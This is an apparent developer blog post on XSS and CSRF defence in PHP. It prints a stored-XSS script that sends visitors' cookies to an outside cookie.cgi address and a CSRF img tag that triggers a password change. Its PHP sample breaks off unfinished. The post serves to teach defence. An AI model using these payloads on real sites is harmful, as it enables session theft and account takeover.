Security should be at the forefront of all developers minds these days and XSS has been coming up as the latest technique to try and extract personal information from your users.

There are two things you need to be concerned about when developing against these attacks.
XSS and CSRF
"Cross Site Scripting" and "Cross Site Forgery Requests"

Defending against these attacks in PHP can be fairly simple yet often overlooked. In XSS the attacker attempts to inject javascript into your application to do malicious harm. So what? what are some alert boxes going to do but bother my users? Here is the most common of the serious attacks:

1. User posts something into your forum that contains javascript such as <script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi? '%20+document.cookie</script>
2. That sits in the database until a user comes along and reads that post on your forum, when they do they'll be redirected to the attackers site, giving their current cookie data for their session and redirect the user back to the original site so the user has no idea, then the attacker can use that session to get into the site as that user.

That is a fairly simple attack to do and has a high success rate on many sites I've come across.
here is a great guide to all the attack vectors someone can take on your site http://ha.ckers.org/xss.html

The other XSS type attack is called Cross Site Forgery which is just as nasty and harder to combat. Think of this situation... someone wants you to post a message, your "friend" sends you a link to a site he just posted something on, however on that site he was able to inject his own img tag such as <img src="http://goodsite.com?mysettings.php?changepassword=newpass">. Now that user is requesting that page as themselves and you can make people do things on websites they don't really want to do :)

I'm working on how to show a POST exploit of this attack, so far I've only seen GET exploits. A great tip I got from Chris Shifflet is adding a "token" to all of your web forms. Store that token in session data and compare the two on form submission, if they do not match then it might not have come from a valid user.

So how do I stop XSS?
there are several methods you can take to dimish the success of XSS attacks. But lets take a sample vulnerable application. We're just going to put up a form, let someone enter some text and then store that text in a flat file and then echo out what they typed. I'm going to assume magic quotes are on as most shared hosts have and PHP4


if($_POST['post'] != '') {
$fp =
}
?>












Ready for More?

Follow Me @jimplush